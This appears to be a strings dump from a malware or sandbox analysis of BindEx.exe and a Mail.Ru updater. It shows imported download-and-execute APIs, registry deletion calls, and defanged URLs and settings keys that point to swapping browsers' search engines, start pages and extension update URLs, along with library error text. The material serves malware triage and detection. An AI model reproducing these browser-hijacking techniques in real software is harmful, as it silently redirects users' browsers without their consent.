,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Interface not supported
Interface not supported
%s (%s, line %d)
%s (%s, line %d)
Operation aborted(Exception %s in module %s at %p.
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
Invalid variant operation
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
!'%s' is not a valid integer value('%s' is not a valid floating point value
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp
'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp
'%s' is not a valid GUID value
'%s' is not a valid GUID value
I/O error %d
I/O error %d
BindEx.exe_708:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
KERNEL32.dll
KERNEL32.dll
BindEx.exe_708_rwx_00350000_00007000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
MSVCRT.dll
MSVCRT.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegEnumKeyExW
RegEnumKeyExW
RegDeleteKeyW
RegDeleteKeyW
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
ShellExecuteExA
ShellExecuteExA
SHELL32.dll
SHELL32.dll
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
PathIsURLA
PathIsURLA
PathIsURLW
PathIsURLW
SHLWAPI.dll
SHLWAPI.dll
BindEx.data
BindEx.data
*.txt
*.txt
%s %s
%s %s
dlinstlit.txt
dlinstlit.txt
F1023_s_30768.exe
F1023_s_30768.exe
RegDeleteKeyExW
RegDeleteKeyExW
$.qmgc
$.qmgc
{00890530-6A9F-4be2-B1BB-73F01E2BB986}
{00890530-6A9F-4be2-B1BB-73F01E2BB986}
{63332668-8CE1-445D-A5EE-25929176714E}
{63332668-8CE1-445D-A5EE-25929176714E}
#32770 (
#32770 (
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
WAdvapi32.dll
WAdvapi32.dll
5*.lnk
5*.lnk
1, 0, 0, 1
1, 0, 0, 1
BindEx.exe
BindEx.exe
BindEx.exe_248:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
KERNEL32.dll
KERNEL32.dll
BindEx.exe_248_rwx_00350000_00007000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
MSVCRT.dll
MSVCRT.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegEnumKeyExW
RegEnumKeyExW
RegDeleteKeyW
RegDeleteKeyW
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
ShellExecuteExA
ShellExecuteExA
SHELL32.dll
SHELL32.dll
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
PathIsURLA
PathIsURLA
PathIsURLW
PathIsURLW
SHLWAPI.dll
SHLWAPI.dll
BindEx.data
BindEx.data
*.txt
*.txt
%s %s
%s %s
dlinstlit.txt
dlinstlit.txt
F1023_s_30768.exe
F1023_s_30768.exe
RegDeleteKeyExW
RegDeleteKeyExW
$.qmgc
$.qmgc
{00890530-6A9F-4be2-B1BB-73F01E2BB986}
{00890530-6A9F-4be2-B1BB-73F01E2BB986}
{63332668-8CE1-445D-A5EE-25929176714E}
{63332668-8CE1-445D-A5EE-25929176714E}
#32770 (
#32770 (
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
WAdvapi32.dll
WAdvapi32.dll
5*.lnk
5*.lnk
1, 0, 0, 1
1, 0, 0, 1
BindEx.exe
BindEx.exe
MailRuUpdater.exe_2368:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
8%u,j
8%u,j
SShDhZ
SShDhZ
8sqliu
8sqliu
u u
u u
FTPSQR
FTPSQR
u.VWh
u.VWh
2 34 567
2 34 567
;%STUV
;%STUV
xSSSh
xSSSh
FTPjKS
FTPjKS
FtPj;S
FtPj;S
C.PjRV
C.PjRV
X
X
RegOpenKeyTransactedW
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyTransactedW
boost::too_few_args: format-string referred to more arguments than were passed
boost::too_few_args: format-string referred to more arguments than were passed
boost::too_many_args: format-string referred to less arguments than were passed
boost::too_many_args: format-string referred to less arguments than were passed
C:\trunk\SputnikLib/reg_key.hpp
C:\trunk\SputnikLib/reg_key.hpp
C:\trunk\SputnikLib/process_enumerate.hpp
C:\trunk\SputnikLib/process_enumerate.hpp
path_name after converting %s
path_name after converting %s
path_name before converting %s
path_name before converting %s
boost::iequals( pEntry.szExeFile, process_name ) == true
boost::iequals( pEntry.szExeFile, process_name ) == true
mailru::sqlite_bind::column_string
mailru::sqlite_bind::column_string
C:\trunk\CommonFiles/sql_lite_bind.hpp
C:\trunk\CommonFiles/sql_lite_bind.hpp
mailru::sqlite_bind::column_blob
mailru::sqlite_bind::column_blob
mailru::sqlite_bind::column_byte_length
mailru::sqlite_bind::column_byte_length
mailru::sqlite_bind::column_blob_as_string
mailru::sqlite_bind::column_blob_as_string
..\CommonFiles\chromium_settings.cpp
..\CommonFiles\chromium_settings.cpp
chrome_url_overrides
chrome_url_overrides
hXXp://VVV.mail.ru
hXXp://VVV.mail.ru
hXXp://mail.ru
hXXp://mail.ru
hXXp://mail.ru/cnt/9824
hXXp://mail.ru/cnt/9824
template_url_data
template_url_data
C:\trunk\CommonFiles/Install_stat.h
C:\trunk\CommonFiles/Install_stat.h
C:\trunk\CommonFiles/file_util.h
C:\trunk\CommonFiles/file_util.h
go.mail.ru
go.mail.ru
mail.ru
mail.ru
startup_urls
startup_urls
suggest_url
suggest_url
search_url
search_url
alternate_urls
alternate_urls
originating_url
originating_url
instant_url_post_params
instant_url_post_params
instant_url
instant_url
image_url_post_params
image_url_post_params
image_url
image_url
favicon_url
favicon_url
hXXp://go.mail.ru/favicon.ico
hXXp://go.mail.ru/favicon.ico
search_url_post_params
search_url_post_params
search_terms_replacement_key
search_terms_replacement_key
D15371FE-C188-4E99-9841-A91F3BCBCCC3
D15371FE-C188-4E99-9841-A91F3BCBCCC3
keyword
keyword
windows-1251
windows-1251
suggestions_url_post_params
suggestions_url_post_params
suggestions_url
suggestions_url
@MAIL.RU
@MAIL.RU
.*yandex\.ru. clid.*
.*yandex\.ru. clid.*
^(chrome-extension://)?(\w{32})?/?
^(chrome-extension://)?(\w{32})?/?
hXXp://VVV.mail.ru/cnt/7861
hXXp://VVV.mail.ru/cnt/7861
hXXp://agent.mail.ru/ru/download/agent_windows/download.html?sputnik=1
hXXp://agent.mail.ru/ru/download/agent_windows/download.html?sputnik=1
hXXp://img.imgsmail.ru/r/agent/favicon.ico
hXXp://img.imgsmail.ru/r/agent/favicon.ico
hXXp://mail.ru/cnt/10445
hXXp://mail.ru/cnt/10445
2.5.3.136
2.5.3.136
hXXp://VVV.mail.ru/
hXXp://VVV.mail.ru/
hXXp://go.mail.ru/search?fr=ntg&q={SearchTerms}
hXXp://go.mail.ru/search?fr=ntg&q={SearchTerms}
hXXp://go.mail.ru/search?fr=ntg&q=
hXXp://go.mail.ru/search?fr=ntg&q=
hXXp://m.mail.ru/cgi-bin/splash?opera=1
hXXp://m.mail.ru/cgi-bin/splash?opera=1
hXXp://VVV.mail.ru/cnt/5090
hXXp://VVV.mail.ru/cnt/5090
hXXp://go.mail.ru/search?q=%s&fr=ntg
hXXp://go.mail.ru/search?q=%s&fr=ntg
@mail.ru
@mail.ru
hXXp://suggests.go.mail.ru/ff3?q={SearchTerm}
hXXp://suggests.go.mail.ru/ff3?q={SearchTerm}
hXXp://go.mail.ru/search_images?utf8in=1&q=%s&fr=oprtb
hXXp://go.mail.ru/search_images?utf8in=1&q=%s&fr=oprtb
hXXp://go.mail.ru/favicon_images.ico
hXXp://go.mail.ru/favicon_images.ico
hXXp://go.mail.ru/search_video?utf8in=1&q=%s&fr=oprtb
hXXp://go.mail.ru/search_video?utf8in=1&q=%s&fr=oprtb
hXXp://go.mail.ru/favicon_video.ico
hXXp://go.mail.ru/favicon_video.ico
hXXp://VVV.mail.ru/cnt/5091
hXXp://VVV.mail.ru/cnt/5091
hXXp://redir.opera.com/speeddials/mail.ru
hXXp://redir.opera.com/speeddials/mail.ru
hXXp://redir.opera.com/bookmarks/mail.ru
hXXp://redir.opera.com/bookmarks/mail.ru
hXXp://go.mail.ru/search?q=%s&fr=opr11
hXXp://go.mail.ru/search?q=%s&fr=opr11
hXXp://go.mail.ru/search?q={SearchTerms}&fr=ntg
hXXp://go.mail.ru/search?q={SearchTerms}&fr=ntg
hXXp://suggests.go.mail.ru/ff3?q={searchTerms}
hXXp://suggests.go.mail.ru/ff3?q={searchTerms}
hXXp://go.mail.ru/?pin=1
hXXp://go.mail.ru/?pin=1
hXXp://mail.ru/cnt/10226
hXXp://mail.ru/cnt/10226
..\CommonFiles\default_browser.cpp
..\CommonFiles\default_browser.cpp
mailru::default_browser::find_executable
mailru::default_browser::find_executable
ConverterIconsFromInternetToAmigo.cpp
ConverterIconsFromInternetToAmigo.cpp
C:\trunk\SputnikLib/one_instance.h
C:\trunk\SputnikLib/one_instance.h
mailru::reg_keyT::check
mailru::reg_keyT::check
mailru::reg_keyT::throw_on_error
mailru::reg_keyT::throw_on_error
InternetProtection.cpp
InternetProtection.cpp
chrome-extension://deejpmlbpbmjecdbfhafkcjeknpnpngh/visual-bookmarks.html
chrome-extension://deejpmlbpbmjecdbfhafkcjeknpnpngh/visual-bookmarks.html
Mail.Ru
Mail.Ru
hXXp://r.mail.ru/cln10322/odnoklassniki.ru
hXXp://r.mail.ru/cln10322/odnoklassniki.ru
cln10322/odnoklassniki.ru
cln10322/odnoklassniki.ru
mail.ru/cnt
mail.ru/cnt
urls_to_restore_on_startup
urls_to_restore_on_startup
@Mail.Ru
@Mail.Ru
hXXp://download.yandex.ru/bar/chrome/updates-translate.xml
hXXp://download.yandex.ru/bar/chrome/updates-translate.xml
hXXp://download.yandex.ru/bar/chrome/updates.xml
hXXp://download.yandex.ru/bar/chrome/updates.xml
hXXp://download.yandex.ru/bar/chrome/updates-vb.xml
hXXp://download.yandex.ru/bar/chrome/updates-vb.xml
update_url
update_url
c:\trunk\sputniklib\auto_handle.hpp
c:\trunk\sputniklib\auto_handle.hpp
c:\trunk\mailruupdater\concrete_update_task.hpp
c:\trunk\mailruupdater\concrete_update_task.hpp
mailru::sqlite_bind::column_int64
mailru::sqlite_bind::column_int64
c:\trunk\mailruupdater\xpom_update_task.hpp
c:\trunk\mailruupdater\xpom_update_task.hpp
Started with cmd line
Started with cmd line
main.cpp
main.cpp
C:\logging\MailRuUpdater.log
C:\logging\MailRuUpdater.log
RestoreVBndDSEViaAutoRun.cpp
RestoreVBndDSEViaAutoRun.cpp
hXXp://xml.binupdate.mail.ru/ext_settings.json
hXXp://xml.binupdate.mail.ru/ext_settings.json
c:\trunk\mailruupdater\SendBrowsersStatistic.h
c:\trunk\mailruupdater\SendBrowsersStatistic.h
updater::SendBrowsersStastic::BrowserData::getDSEurl
updater::SendBrowsersStastic::BrowserData::getDSEurl
updater::SendBrowsersStastic::BrowserData::getDSEurl
updater::SendBrowsersStastic::BrowserData::getDSEurl
SendBrowsersStatistic.cpp
SendBrowsersStatistic.cpp
asio.misc
asio.misc
C:\trunk\3party\boost-1.49\boost/exception/detail/exception_ptr.hpp
C:\trunk\3party\boost-1.49\boost/exception/detail/exception_ptr.hpp
asio.misc error
asio.misc error
C:\trunk\3party\ticpp/ticpp.h
C:\trunk\3party\ticpp/ticpp.h
cmd_line
cmd_line
md5 fetch url
md5 fetch url
Program fetch url
Program fetch url
fetch_url
fetch_url
update_info.cpp
update_info.cpp
util.cpp
util.cpp
YandexRemover.cpp
YandexRemover.cpp
Can't terminate a sub-expression with an alternation operator |.
Can't terminate a sub-expression with an alternation operator |.
A regular expression can start with the alternation operator |.
A regular expression can start with the alternation operator |.
Alternation operators are not allowed inside a DEFINE block.
Alternation operators are not allowed inside a DEFINE block.
More than one alternation operator | was encountered inside a conditional expression.
More than one alternation operator | was encountered inside a conditional expression.
A repetition operator cannot be applied to a zero-width assertion.
A repetition operator cannot be applied to a zero-width assertion.
Invalid alternation operators within (?...) block.
Invalid alternation operators within (?...) block.
The \c and \C escape sequences are not supported by POSIX basic regular expressions: try the Perl syntax instead.
The \c and \C escape sequences are not supported by POSIX basic regular expressions: try the Perl syntax instead.
Found a closing repetition operator } with no corresponding {.
Found a closing repetition operator } with no corresponding {.
The repeat operator " " cannot start a regular expression.
The repeat operator " " cannot start a regular expression.
The repeat operator "?" cannot start a regular expression.
The repeat operator "?" cannot start a regular expression.
The repeat operator "*" cannot start a regular expression.
The repeat operator "*" cannot start a regular expression.
right-curly-bracket
right-curly-bracket
left-curly-bracket
left-curly-bracket
0123456789
0123456789
Unmatched quantified repeat operator { or \{.
Unmatched quantified repeat operator { or \{.
Invalid preceding regular expression prior to repetition operator.
Invalid preceding regular expression prior to repetition operator.
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
sqlite.cpp
sqlite.cpp
mailru::sqlite::database::database
mailru::sqlite::database::database
mailru::logging::execution_time_logger::~execution_time_logger
mailru::logging::execution_time_logger::~execution_time_logger
logger.cpp
logger.cpp
process_util.cpp
process_util.cpp
Path.cpp
Path.cpp
[%d][%d][d.d d:d:d]
[%d][%d][d.d d:d:d]
"#%{}|\^~[] ?&@=:,
"#%{}|\^~[] ?&@=:,
hXXps://
hXXps://
hXXp://
hXXp://
HTTP/1.1
HTTP/1.1
c:\trunk\sputniklib\http_downloader.h
c:\trunk\sputniklib\http_downloader.h
mailru::http::request_headers::get_header
mailru::http::request_headers::get_header
thread.exit_event
thread.exit_event
thread.entry_event
thread.entry_event
127.0.0.1
127.0.0.1
mailru::http::response_headers::get_file_time
mailru::http::response_headers::get_file_time
mailru::http::response_headers::response_headers
mailru::http::response_headers::response_headers
^HTTP/1.1 (\d ) (. )
^HTTP/1.1 (\d ) (. )
http_downloader.cpp
http_downloader.cpp
mailru::http::downloader_impl::handle_read_headers
mailru::http::downloader_impl::handle_read_headers
mailru::http::downloader_impl::connection_data_file::~connection_data_file
mailru::http::downloader_impl::connection_data_file::~connection_data_file
mailru::http::downloader::fetch_file_attributes
mailru::http::downloader::fetch_file_attributes
HTTP error %2%: %3%
HTTP error %2%: %3%
mailru::http::fetch_wstring_via_tempfile
mailru::http::fetch_wstring_via_tempfile
unzip.cpp
unzip.cpp
Resource.cpp
Resource.cpp
version_info.cpp
version_info.cpp
shortcut.cpp
shortcut.cpp
is_admin.cpp
is_admin.cpp
url_parser.cpp
url_parser.cpp
mailru::url_parser::init
mailru::url_parser::init
Line %d, Column %d
Line %d, Column %d
large file support is disabled
large file support is disabled
unknown operation
unknown operation
SQL logic error or missing database
SQL logic error or missing database
foreign_keys
foreign_keys
sqlite_compileoption_get
sqlite_compileoption_get
sqlite_compileoption_used
sqlite_compileoption_used
sqlite_log
sqlite_log
sqlite_source_id
sqlite_source_id
sqlite_version
sqlite_version
sqlite_attach
sqlite_attach
sqlite_detach
sqlite_detach
sqlite_stat1
sqlite_stat1
sqlite_rename_parent
sqlite_rename_parent
sqlite_rename_trigger
sqlite_rename_trigger
sqlite_rename_table
sqlite_rename_table
RowKey
RowKey
3.7.11
3.7.11
SQLite format 3
SQLite format 3
CREATE TABLE sqlite_master(
CREATE TABLE sqlite_master(
sql text
sql text
CREATE TEMP TABLE sqlite_temp_master(
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
922337203685477580
922337203685477580
SQLITE_
SQLITE_
?API call with %s database connection pointer
?API call with %s database connection pointer
OsError 0x%x (%u)
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
delayed %dms for lock/sharing conflict
%s\etilqs_
%s\etilqs_
cannot limit WAL size: %s
cannot limit WAL size: %s
2nd reference to page %d
2nd reference to page %d
invalid page number %d
invalid page number %d
%s(%d)
%s(%d)
keyinfo(%d
keyinfo(%d
%r %s BY term out of range - should be between 1 and %d
%r %s BY term out of range - should be between 1 and %d
Expression tree is too large (maximum depth %d)
Expression tree is too large (maximum depth %d)
too many SQL variables
too many SQL variables
variable number must be between ?1 and ?%d
variable number must be between ?1 and ?%d
too many columns in %s
too many columns in %s
%s OR name=%Q
%s OR name=%Q
type='trigger' AND (%s)
type='trigger' AND (%s)
table %s may not be altered
table %s may not be altered
sqlite_
sqlite_
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
access to %s.%s.%s is prohibited
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
object name reserved for internal use: %s
duplicate column name: %s
duplicate column name: %s
too many columns on %s
too many columns on %s
DELETE FROM %Q.%s WHERE %s=%Q
DELETE FROM %Q.%s WHERE %s=%Q
sqlite_stat%d
sqlite_stat%d
unknown column "%s" in foreign key definition
unknown column "%s" in foreign key definition
number of columns in foreign key does not match the number of columns in the referenced table
number of columns in foreign key does not match the number of columns in the referenced table
foreign key on %s should reference only one column of table %T
foreign key on %s should reference only one column of table %T
a JOIN clause is required before %s
a JOIN clause is required before %s
cannot modify %s because it is a view
cannot modify %s because it is a view
table %s may not be modified
table %s may not be modified
foreign key mismatch
foreign key mismatch
error during initialization: %s
error during initialization: %s
no entry point [%s] in shared library [%s]
no entry point [%s] in shared library [%s]
unable to open shared library [%s]
unable to open shared library [%s]
sqlite3_extension_init
sqlite3_extension_init
unknown or unsupported join type: %T %T%s%T
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
RIGHT and FULL OUTER JOINs are not currently supported
USE TEMP B-TREE FOR %s
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s:%d
%s:%d
no such index: %s
no such index: %s
SCAN TABLE %s %s%s(~%d rows)
SCAN TABLE %s %s%s(~%d rows)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
sqlite_master
sqlite_master
sqlite_temp_master
sqlite_temp_master
vtable constructor did not declare schema: %s
vtable constructor did not declare schema: %s
vtable constructor failed: %s
vtable constructor failed: %s
no such module: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
table %s: xBestIndex returned an invalid plan
%s (~%lld rows)
%s (~%lld rows)
%s VIRTUAL TABLE INDEX %d:%s
%s VIRTUAL TABLE INDEX %d:%s
%s (rowid)
%s (rowid)
%s (rowid>?)
%s (rowid>?)
%s (rowid>? AND rowid)
%s (rowid>? AND rowid)
%s (rowid=?)
%s (rowid=?)
%s USING INTEGER PRIMARY KEY
%s USING INTEGER PRIMARY KEY
%s USING %s%sINDEX%s%s%s
%s USING %s%sINDEX%s%s%s
%s AS %s
%s AS %s
%s TABLE %s
%s TABLE %s
%s SUBQUERY %d
%s SUBQUERY %d
database corruption at line %d of [%.10s]
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
cannot open file at line %d of [%.10s]
failed to allocate %u bytes of memory
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
failed memory resize %u to %u bytes
foreign key constraint failed
foreign key constraint failed
unable to use function %s in the requested context
unable to use function %s in the requested context
zeroblob(%d)
zeroblob(%d)
CREATE TABLE %Q.%s(%s)
CREATE TABLE %Q.%s(%s)
%s %T cannot reference objects in database %s
%s %T cannot reference objects in database %s
default value of column [%s] is not constant
default value of column [%s] is not constant
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
no such collation sequence: %s
no such collation sequence: %s
%s - %s
%s - %s
malformed database schema (%s)
malformed database schema (%s)
cannot join using column %s - column not present in both tables
cannot join using column %s - column not present in both tables
cannot have both ON and USING clauses in the same join
cannot have both ON and USING clauses in the same join
a NATURAL join may not have an ON or USING clause
a NATURAL join may not have an ON or USING clause
%s.%s
%s.%s
bind on a busy prepared statement: [%s]
bind on a busy prepared statement: [%s]
%s: %s
%s: %s
%s: %s.%s
%s: %s.%s
%s: %s.%s.%s
%s: %s.%s.%s
misuse of aliased aggregate %s
misuse of aliased aggregate %s
not authorized to use function: %s
not authorized to use function: %s
too many terms in %s BY clause
too many terms in %s BY clause
EXECUTE %s%s SUBQUERY %d
EXECUTE %s%s SUBQUERY %d
%.*s"%w"%s
%.*s"%w"%s
%s%.*s"%w"
%s%.*s"%w"
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
Cannot add a PRIMARY KEY column
Cannot add a PRIMARY KEY column
invalid name: "%s"
invalid name: "%s"
automatic extension loading failed: %s
automatic extension loading failed: %s
d-d-d d:d:d
d-d-d d:d:d
d:d:d
d:d:d
d-d-d
d-d-d
SELECTs to the left and right of %s do not have the same number of result columns
SELECTs to the left and right of %s do not have the same number of result columns
LIMIT clause should come after %s not before
LIMIT clause should come after %s not before
ORDER BY clause should come after %s not before
ORDER BY clause should come after %s not before
BmTindexed columns are not unique
BmTindexed columns are not unique
%s-shm
%s-shm
Recovered %d frames from WAL file %s
Recovered %d frames from WAL file %s
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Failed to read ptrmap key=%d
Failed to read ptrmap key=%d
failed to get page %d
failed to get page %d
%d of %d pages missing from overflow list starting at %d
%d of %d pages missing from overflow list starting at %d
freelist leaf count too big on page %d
freelist leaf count too big on page %d
Fragmentation of %d bytes reported as %d on page %d
Fragmentation of %d bytes reported as %d on page %d
Multiple uses for byte %d of page %d
Multiple uses for byte %d of page %d
Corruption detected in cell %d on page %d
Corruption detected in cell %d on page %d
On page %d at right child:
On page %d at right child:
On tree page %d cell %d:
On tree page %d cell %d:
unable to get the page. error code=%d
unable to get the page. error code=%d
btreeInitPage() returns error code %d
btreeInitPage() returns error code %d
Page %d:
Page %d:
Outstanding page count goes from %d to %d during this analysis
Outstanding page count goes from %d to %d during this analysis
Pointer map page %d is referenced
Pointer map page %d is referenced
Page %d is never used
Page %d is never used
sqlite3_get_table() called with two or more incompatible queries
sqlite3_get_table() called with two or more incompatible queries
no such vfs: %s
no such vfs: %s
%s mode not allowed: %s
%s mode not allowed: %s
no such %s mode: %s
no such %s mode: %s
MJ delete: %s
MJ delete: %s
-mjX9X
-mjX9X
MJ collide: %s
MJ collide: %s
%s-mjXXXXXX9XXz
%s-mjXXXXXX9XXz
database %s is locked
database %s is locked
cannot detach database %s
cannot detach database %s
no such database: %s
no such database: %s
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
unable to close due to unfinished backup operation
unable to close due to unfinished backup operation
unknown database: %s
unknown database: %s
unknown database %s
unknown database %s
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
PRIMARY KEY must be unique
PRIMARY KEY must be unique
%s.%s may not be NULL
%s.%s may not be NULL
database schema is locked: %s
database schema is locked: %s
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
PRAGMA vacuum_db.synchronous=OFF
PRAGMA vacuum_db.synchronous=OFF
cannot VACUUM - SQL statements in progress
cannot VACUUM - SQL statements in progress
misuse of aggregate: %s()
misuse of aggregate: %s()
constraint failed at %d in [%s]
constraint failed at %d in [%s]
abort at %d in [%s]: %s
abort at %d in [%s]: %s
database table is locked: %s
database table is locked: %s
cannot change %s wal mode from within a transaction
cannot change %s wal mode from within a transaction
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot commit transaction - SQL statements in progress
cannot commit transaction - SQL statements in progress
cannot release savepoint - SQL statements in progress
cannot release savepoint - SQL statements in progress
no such savepoint: %s
no such savepoint: %s
cannot open savepoint - SQL statements in progress
cannot open savepoint - SQL statements in progress
statement aborts at %d: [%s] %s
statement aborts at %d: [%s] %s
cannot use index: %s
